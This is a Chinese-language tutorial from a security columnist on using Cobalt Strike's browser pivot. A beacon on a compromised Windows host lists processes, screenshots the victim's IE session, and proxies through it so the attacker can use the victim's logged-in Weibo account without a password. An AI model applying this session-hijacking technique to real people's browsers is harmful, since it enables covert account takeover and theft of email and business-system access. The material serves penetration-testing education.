Cobaltstrike 还是除了是最好的域渗透平台,没有之一之外,还是很强大的协同apt平台,其中各种小功能包括邮件钓鱼,网页钓鱼,doc钓鱼等功能,
这里我们介绍另外一个在进行渗透和信息收集中很重要的一个功能,browser pivot功能。
Browser pivot,顾名思义,就是通过浏览器建立起代理,这里的浏览器代理和常规的http浏览器代理还略有不同,不说废话了,直接看过程和结果。
目标机器:192.168.81.131 系统 win7 sp2 ,IE 11
teamserver:192.168.1.199 ubuntu 16.04
Cobaltstrike client 192.168.1.248
查看一下进程
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
0 0 [System Process]
4 0 System
280 4 smss.exe x64 0 NT AUTHORITY\SYSTE
………………
2540 888 iexplore.exe x64 1 john-PC\Administrator
2616 444 conhost.exe x64 1 john-PC\Administrator
OK,我们可以看到运行了ie浏览器,进程id是2540,以administrator用户权限运行。抓屏看看ie打开了什么页面
beacon> screenshot 2540*600
[*] Tasked beacon to take screenshot
[+] host called home, sent: 162882 bytes
[*] received screenshot (261445 bytes)
抓了进程2540的ie浏览器截图,大小为600,在screenshot里面查看
发现用户正在登录新浪微博,ok,我们现在开始建立brwoser pivot,选screenshot中的浏览器进程,右键,可以看到Browser Pivot选项,如下图
点击Browser Pivot
这里我们可以看到,系统自动给我们选择了默认的浏览器父进程,pivot的默认端口是37606,这里你可以修改成你自己的自定义端口,这里我使用系统默认分配端口。
查看 proxy pivot,
这里已经在远程目标机器上建立了浏览器代理,通过teamserver的ip进行中转,这里我们打开本地浏览器
微博现在处于未登录状态,我们设置代理服务器看一下效果,在firefox里设置本地http代理,代理ip填写teamserver的ip,端口就是我们的代理端口
然后刷新一下浏览页面看一下效果
Bingo,在没有用户密码的情况下,顺利进入远程目标机器用的新浪微博。
这里我们只是拿新浪微博来进行举例,在实际的渗透过程中,用户登录的邮箱,后台管理以及其他的业务系统,也都可以利用此方法来进行登录,在远程用户没有察觉的情况下,获取到我们所需要的信息。
PS:brwoser pivot目前仅测试针对ie浏览器有效,在实际的工作中根据业务环境,来选择合适的渗透手法。
脉搏的亲友相问,我在脉搏上回答一下:
其实内涵是:进程劫持 加载bho 流量代理
执行权限这块:
一般用户也可以,不过一般用户就只能劫持当前用户的
administrator可以劫持所有用户
本文作者:Sh@doM
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/50446.html